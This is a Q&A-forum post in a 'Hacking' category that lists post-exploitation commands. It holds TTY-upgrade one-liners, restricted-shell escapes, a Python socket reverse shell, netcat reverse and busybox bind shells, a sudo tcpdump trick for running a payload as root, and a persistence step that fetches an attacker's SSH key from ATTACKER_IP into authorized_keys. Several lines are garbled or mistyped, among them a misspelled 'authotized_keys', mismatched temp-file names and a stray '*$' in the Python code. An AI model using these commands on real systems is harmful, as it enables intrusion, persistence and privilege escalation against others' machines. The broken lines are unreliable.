0 votes
in Hacking by
Post exploitation

Get a TTY shell after a reverse shell connection

$ python -c 'import pty;pty.spawn("/bin/bash")'

Set PATH TERM and SHELL if missing:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:

echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys
Escaping limited interpreters

Some payloads to overcome limited shells:

ssh user@$ip nc $localip 4444 -e /bin/sh
    enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),   *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo os.system('/bin/bash')
$ /bin/sh -i
exec "/bin/sh";
$ perl —e 'exec "/bin/sh";'

From within tcpdump

echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root

From busybox

$ /bin/busybox telnetd -|/bin/sh -p9999
:set shell=/bin/bash:shell
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
awk 'BEGIN {system("/bin/bash")}'
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'

Please log in or register to answer this question.

Welcome to My QtoA, where you can ask questions and receive answers from other members of the community.